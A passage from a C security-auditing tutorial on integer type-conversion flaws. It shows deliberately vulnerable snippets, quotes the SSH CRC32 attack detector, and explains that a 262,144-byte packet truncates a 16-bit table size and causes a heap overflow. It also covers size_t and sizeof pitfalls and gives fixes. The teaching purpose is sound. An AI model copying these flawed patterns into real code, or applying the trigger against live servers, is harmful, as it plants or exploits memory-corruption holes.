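}

/* Size malloc would be asked for: length + 1 is computed as an int. */
static size_t flawed_alloc_size(short length)
{
    return (size_t)(length + 1);
}

/* Count read() would receive: the short is converted to size_t. */
static size_t flawed_read_count(short length)
{
    return (size_t)length;
}

/* Possible fix: keep the length unsigned so the bound check is meaningful. */
static int length_is_acceptable(unsigned short wire_len)
{
    return wire_len <= MAX_PACKET;
}
```

Keeping the length in an unsigned short, as in length_is_acceptable, makes 65535 fail the bound check instead of slipping under it.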

The Art of Software Security Assessment (adapted from listing 6-19)
/* Detect a crc32 compensation attack on a packet */
int
detect_attack(unsigned char *buf, u_int32_t len,
              unsigned char *IV)
{
    static u_int16_t *h = (u_int16_t *) NULL;
    static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
    register u_int32_t i, j;
    u_int32_t l;
    register unsigned char *c;
    unsigned char *d;

    if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
        len % SSH_BLOCKSIZE != 0) {
        fatal("detect_attack: bad length %d", len);
    }
for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
       ;
if (h == NULL) {
    debug("Installing crc compensation "
          "attack detector.");
    n = l;
    h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
} else {
    if (l > n) {
        n = l;
        h = (u_int16_t *)xrealloc(h, n * HASH_ENTRYSIZE);
    }
}
if (len <= HASH_MINBLOCKS) {
        for (c = buf; c < buf + len; c += SSH_BLOCKSIZE) {
            if (IV && (!CMP(c, IV))) {
                if ((check_crc(c, buf, len, IV)))
                    return (DEATTACK_DETECTED);
                else
                    break;
            }
            for (d = buf; d < c; d += SSH_BLOCKSIZE) {
                if (!CMP(c, d)) {
                    if ((check_crc(c, buf, len, IV)))
                    return (DEATTACK_DETECTED);
                else
                    break;
               }
           }
       }
       return (DEATTACK_OK);
    }
memset(h, HASH_UNUSEDCHAR, n * HASH_ENTRYSIZE);

    if (IV)
        h[HASH(IV) & (n - 1)] = HASH_IV;

    for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
        for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
             i = (i + 1) & (n - 1)) {
            if (h[i] == HASH_IV) {
                if (!CMP(c, IV)) {
                    if (check_crc(c, buf, len, IV))
                        return (DEATTACK_DETECTED);
                    else
                        break;
                 }
             } else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
                 if (check_crc(c, buf, len, IV))
                     return (DEATTACK_DETECTED);
                 else
                     break;
             }
          }
          h[i] = j;
       }
    return (DEATTACK_OK);
}

 

This is fairly complex code and finding the vulnerability at first glance is hard, but you should concentrate on your goal. For example, the memset call makes us suspect a buffer overflow, so our goal is to check the code for buffer overflow vulnerabilities. In one of the iterations we check the code for type conversion issues, and for that we check the variable definitions and the assignments that follow. After looking at the declarations at the top of the function, we should focus on finding any assignment between the u_int16_t variable n (which sizes the table h) and the u_int32_t variable l. We quickly find such a conversion in n = l, and further analysis shows that by sending a packet of size 262,144 we can cause a buffer overflow: l can grow to a value that no longer fits in 16 bits, so n is truncated. Because n is used to size the allocation of h, and h is later written to while the network data is processed (for example in h[i] = j), memory outside the buffer is overwritten.

While auditing, always check operations that involve the size_t type (an unsigned integer type), which is the result type of many libc functions. Arithmetic that mixes such a value with an int yields an unsigned result, so any code that treats the result as a signed integer is incorrect. A likely mistake is using a size_t value in a subtraction and then comparing the result with a negative value. Comparisons that are supposed to protect an allocation or an indexing operation are also candidate statements to inspect for vulnerabilities. So always check these kinds of comparisons and keep in mind that unsigned values cannot be negative!
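The effect of storing a 32-bit value in a 16-bit variable can be checked with a short sketch. The names below are hypothetical and ENTRY_SIZE is an assumed stand-in for the size of one table entry; the code only illustrates the integer behavior and is not taken from the SSH source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ENTRY_SIZE 2u   /* assumed entry size, matching sizeof(u_int16_t) */

/* Storing a 32-bit value in a 16-bit variable keeps only the low 16 bits. */
static uint16_t truncate_to_16(uint32_t l)
{
    return (uint16_t)l;
}

/* Number of bytes an allocation of n entries would request. */
static uint32_t table_bytes(uint16_t n)
{
    return (uint32_t)n * ENTRY_SIZE;
}

/* Index mask as computed by "& (n - 1)": n is promoted to int first,
 * so n == 0 gives -1, a mask with every bit set. */
static uint32_t index_mask(uint16_t n)
{
    return (uint32_t)(n - 1);
}

/* Possible fix: refuse values that do not fit instead of truncating. */
static int narrow_checked(uint32_t l, uint16_t *n)
{
    assert(n != NULL);
    if (l > UINT16_MAX)
        return 0;
    *n = (uint16_t)l;
    return 1;
}
```

Once l reaches 0x10000 the truncated n is 0, the requested table size is 0 bytes, and the index mask no longer restricts the index at all.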
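The subtraction mistake is easy to reproduce. In this sketch (hypothetical names) the flawed version returns the wrapped difference a careless check would rely on, while the checked version compares the operands before subtracting.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Flawed: size_t arithmetic cannot go negative. When used > capacity
 * the difference wraps to a huge value instead of becoming negative. */
static size_t remaining_flawed(size_t capacity, size_t used)
{
    return capacity - used;
}

/* Checked: compare first, subtract only when the result is meaningful.
 * Returns 1 and stores the remaining space, or 0 if used > capacity. */
static int remaining_checked(size_t capacity, size_t used, size_t *out)
{
    assert(out != NULL);
    if (used > capacity)
        return 0;
    *out = capacity - used;
    return 1;
}
```

A test such as "remaining < 0" can never be true for the flawed result, which is why the comparison has to be made on the operands themselves.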

C vulnerable functions

As a rule of thumb, you should always examine the possibility of negative numbers being passed to read(), recvfrom(), memcpy(), memset(), bcopy(), snprintf(), strncat(), strncpy(), and malloc(). You have seen subtle vulnerabilities in this article, and by now you should be convinced that in certain situations these functions are not safe at all. The real problem is the calculation of the buffer sizes these functions use, and you should check those calculations closely.

Also pay careful attention to the use of the sizeof operator. Remember that the result of sizeof is unsigned (size_t), so operations that include it do not produce negative values. sizeof should be examined closely wherever buffers are allocated. One common sizeof issue is applying it to a pointer to a buffer and expecting it to return the size of the buffer; the result of sizeof on a pointer is the size of the pointer itself. For example, the result of sizeof on c (a char pointer) is 4 on a 32-bit system! Another mistake is using sizeof to guard a loop that fills a buffer. For example:

int buf[1024];

int *b=buf;

 

while (havedata() && b < buf + sizeof(buf))

{

    *b++=parseint(getdata());

}

 

Here buf + sizeof(buf) does not guard the loop against a buffer overflow, because the loop can execute 4096 times, not 1024! sizeof(buf) is the size in bytes (1024 * 4 = 4096 with a 4-byte int), whereas pointer arithmetic and ++ advance the pointer by whole elements, not by bytes.
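A corrected guard bounds the pointer by the number of elements rather than the number of bytes. The sketch below is an assumption-laden stand-in for the loop above: ARRAY_COUNT, fill and the src array are hypothetical and replace havedata(), getdata() and parseint(), which are not shown in the original.

```c
#include <assert.h>
#include <stddef.h>

#define ARRAY_COUNT(a) (sizeof(a) / sizeof((a)[0]))

static int buf[1024];

/* Bound (in elements) implied by the flawed guard buf + sizeof(buf). */
static size_t flawed_limit(void)
{
    return sizeof(buf);
}

/* Correct bound: the number of elements in the array. */
static size_t correct_limit(void)
{
    return ARRAY_COUNT(buf);
}

/* Copies values from src into buf, stopping at the real end of buf.
 * Returns the number of elements stored. */
static size_t fill(const int *src, size_t available)
{
    int *b = buf;
    const int *end = buf + ARRAY_COUNT(buf);
    size_t i = 0;

    assert(src != NULL || available == 0);
    while (i < available && b < end)
        *b++ = src[i++];
    return (size_t)(b - buf);
}
```

Dividing sizeof(buf) by the size of one element keeps the bound correct even if the element type of buf changes later.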
